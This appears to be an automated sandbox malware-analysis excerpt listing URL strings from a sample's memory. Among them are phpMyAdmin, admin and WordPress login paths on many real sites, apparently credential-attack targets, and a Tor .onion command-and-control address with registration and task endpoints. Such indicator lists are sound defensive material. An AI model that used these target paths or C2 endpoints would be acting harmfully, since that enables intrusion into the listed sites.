Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sofia-communications.com/phpMyAdmin/Q
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sofia-communications.com/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sofia-communications.com/phpmyadmin/O
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sofia-communications.com/pma/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sofia-communications.com/pma/Admin/=
Source: klWGq3yDcQ.exe, 00000001.00000002.2884890826.0000000003E7A000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886486906.000000000425C000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886296265.00000000040CB000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000003.2251172424.000000004E5EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://status.rapidssl.com0
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://student.debritto.sch.id/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://student.debritto.sch.id/PhpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003CF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://student.debritto.sch.id/administrator/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://student.debritto.sch.id/phpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://student.debritto.sch.id/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://student.debritto.sch.id/pma/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://student.debritto.sch.id/pma/admin/rtgag
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.000000000409A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://student.debritto.sch.id/wp-login.php
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://student.ub.ac.id/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://student.ub.ac.id/PhpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://student.ub.ac.id/mycom
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://student.ub.ac.id/phpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://student.ub.ac.id/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://student.ub.ac.id/phpmyadmin/=
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://student.ub.ac.id/pma/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://student.ub.ac.id/pma/om
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://students.kasralainy.edu.eg/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.00000000043A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://students.kasralainy.edu.eg/PhpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.00000000043A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://students.kasralainy.edu.eg/PhpMyAdmin/p-
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004005000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://students.kasralainy.edu.eg/administrator/index.php
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004005000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://students.kasralainy.edu.eg/administrator/index.phpca
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.00000000043A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://students.kasralainy.edu.eg/phpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.00000000043A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://students.kasralainy.edu.eg/phpMyAdmin/B-m
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.00000000043A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://students.kasralainy.edu.eg/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.00000000043A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://students.kasralainy.edu.eg/pma/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.00000000043A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://students.kasralainy.edu.eg/pma/Admin/g-H
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://t1eng.com/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://t1eng.com/PhpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://t1eng.com/PhpMyAdmin/6
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://t1eng.com/phpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://t1eng.com/phpMyAdmin/n/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://t1eng.com/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://t1eng.com/pma/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://t1eng.com/pma/Admin/m
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003B74000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2887494759.00000000043C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://talentius.com/
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://talentius.com/#contact
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://talentius.com/#experties
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://talentius.com/#responsive
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://talentius.com/#servicios
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://talentius.com/aviso-legal/#aviso-legal
Source: klWGq3yDcQ.exe, 00000001.00000002.2887494759.00000000043C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://talentius.com/com
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://talentius.com/politica-de-cookies/#politica-de-cookies
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://talentius.com/politica-de-privacidad/#politica-de-privacidad
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003B74000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://talentius.com/wp-content/uploads/2017/02/logo-white.png
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://townshipnjr.com/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://townshipnjr.com/PhpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://townshipnjr.com/dj2m6eq
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://townshipnjr.com/phpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://townshipnjr.com/phpMyAdmin/u
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://townshipnjr.com/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://townshipnjr.com/phpmyadmin/0n
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://townshipnjr.com/pma/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://townshipnjr.com/pma/com
Source: klWGq3yDcQ.exe, 00000001.00000002.2887494759.00000000043C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tradeavenida.com/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887494759.00000000043C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tradeavenida.com//?
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tradeavenida.com/PhpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tradeavenida.com/phpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tradeavenida.com/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004005000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tradeavenida.com/wp-admin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004005000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tradeavenida.com/wp-admin/micro-design.com2111Li
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.000000000400D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wasserman.us/PhpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.000000000400D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wasserman.us/phpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.000000000400D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wasserman.us/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.000000000400D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wasserman.us/phpmyadmin/)x
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.000000000400D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wasserman.us/pma/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.000000000400D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wasserman.us/pma/Admin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.0000000004389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wonka.cc/PhpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.0000000004389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wonka.cc/phpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.0000000004389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wonka.cc/phpMyAdmin/Pwo
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.0000000004389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wonka.cc/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.0000000004389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wonka.cc/pma/
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww38.ondania.com/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMDN8fHx8fHw2NTYyZGVkMzNi
Source: klWGq3yDcQ.exe, 00000001.00000002.2887027217.00000000042A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww38.ondania.com/administrator/?subid1=20231126-1659-4566-b4f3-ee8b4e33b307
Source: klWGq3yDcQ.exe, 00000001.00000002.2887027217.00000000042A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww38.ondania.com/administrator/?subid1=20231126-1659-4566-b4f3-ee8b4e33b307bx
Source: klWGq3yDcQ.exe, 00000001.00000002.2887027217.00000000042A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww38.ondania.com/administrator/index.php?subid1=20231126-1659-59fe-8cf7-5e631aeffacc
Source: klWGq3yDcQ.exe, 00000001.00000002.2887027217.00000000042A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww38.ondania.com/administrator/index.php?subid1=20231126-1659-59fe-8cf7-5e631aeffacca
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003B74000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004005000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003CF7000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2885992508.000000000409A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004075000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2884890826.0000000003E7A000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2887494759.00000000043C8000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886486906.000000000425C000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886351105.0000000004122000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2887027217.00000000042A7000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886351105.00000000040EF000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886296265.00000000040CB000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000003.2251172424.000000004E5EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0s
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003B74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPSe
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004005000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPSv?
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.00000000043A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.grantstech.io/PhpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2884890826.0000000003E7A000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2885992508.00000000040B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.grg17geblergasse.at/wp-includes/css/dist/block-library/style.min.css?ver=6.4.1
Source: klWGq3yDcQ.exe, 00000001.00000002.2884890826.0000000003E7A000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2885992508.00000000040B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.grg17geblergasse.at/xmlrpc.php
Source: klWGq3yDcQ.exe, 00000001.00000002.2886351105.0000000004122000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.karinshobbyfotografie.nl/index.html
Source: klWGq3yDcQ.exe, 00000001.00000002.2866921685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, csrss.exe, 00000004.00000002.3484645530.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
Source: klWGq3yDcQ.exe, 00000001.00000002.2866921685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, csrss.exe, 00000004.00000002.3484645530.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/support/faq.htmlTYPE=2OpenSSL
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.0000000004319000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.spamhaus.org/query/bl?ip=89.149.18.60
Source: klWGq3yDcQ.exe, 00000001.00000002.2884890826.0000000003E7A000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003FE2000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2887067492.000000000436E000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886351105.00000000040EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887588320.0000000004405000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004012000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
Source: klWGq3yDcQ.exe, 00000001.00000002.2884890826.0000000003E7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/i-
Source: klWGq3yDcQ.exe, 00000001.00000002.2884890826.0000000003E7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887588320.0000000004405000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004012000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
Source: klWGq3yDcQ.exe, 00000001.00000002.2884890826.0000000003E7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/himontessori.com
Source: klWGq3yDcQ.exe, 00000001.00000002.2884890826.0000000003E7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x5outc76j5k4qrzaqdj2m6eq4amkkpndbqyvmvaz6yl4mmfco6oqxsqd.onion/hb.php?n=19EE1A200E1DF5D59DA8&
Source: klWGq3yDcQ.exe, 00000001.00000002.2866921685.0000000000824000.00000040.00000400.00020000.00000000.sdmp, csrss.exe, 00000004.00000002.3484645530.0000000000824000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://x5outc76j5k4qrzaqdj2m6eq4amkkpndbqyvmvaz6yl4mmfco6oqxsqd.onionT/reg.php?upd.php?/task.php?/re
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://y3.qj51acp/administrator/index.php
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://y3.qj51acp/administrator/index.phpopen)n~
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://yahoo.comfreezed/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2866921685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, csrss.exe, 00000004.00000002.3484645530.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https:///phpMyAdmin//PhpMyAdmin//pma/rootmysqlimapssmtpspop3sscp://your_IP_is_greylisted_README.txt2
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003D1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://117.20.63.148:2031/pma/
Source: klWGq3yDcQ.exe, 00000001.00000002.2886351105.0000000004122000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a.jimdo.com/app/auth/signin/jumpcms/?page=2060364879
Source: klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003FAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aadcdn.msauth.net
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003FAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_ltjvsvk5aekta_kgibi0gg2
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003FAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_7-fvwaoy6tcz
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003FAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aadcdn.msauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003FAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aadcdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_LRl_HOP41vTvA9IKhSqNsg2.js
Source: klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003FAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_ltjvsvk5aekta_kgibi0g
Source: klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003FAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_7-fvwaoy6t
Source: klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003FAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aadcdn.msftauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
Source: klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003FAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aadcdn.msftauth.net/shared/1.0/content/js/ConvergedLogin_PCore_LRl_HOP41vTvA9IKhSqNsg2.js
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003D22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://adm.uksw.edu/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.000000000414C000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.000000000414C000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004034000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003B74000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.w.org/
Source: klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003F9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.canaldapeca.com.br/static/cws-theme-tokens.umd.min.js
Source: klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003F9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.cws.digital/static/bootstrap/4.6.2/js/bootstrap.min.js
Source: klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003F9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.cws.digital/static/popper.js/1.14.6/umd/popper.min.
Source: klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003F9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.cws.digital/static/popper.js/1.14.6/umd/popper.min.:
Source: klWGq3yDcQ.exe, 00000001.00000002.2886351105.0000000004122000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.jimstatic.com/web.js.30196931e46e05701bed.js
Source: klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003FA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://beachrecruitment.com/administrator/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887494759.00000000043B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunasta.eu/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://c.la2-c2-ia5.salesforceliveagent.com/content
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004012000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://captcha.wpsecurity.godaddy.com/api/v1/captcha/script?trigger=wp_login
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cardenas.mtz.rimed.cu/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://carelesscommunity.com/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://carelesscommunity.com/phpmyadmin//8
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004034000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000003.2251172424.000000004E5EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.jsdelivr.net/npm/
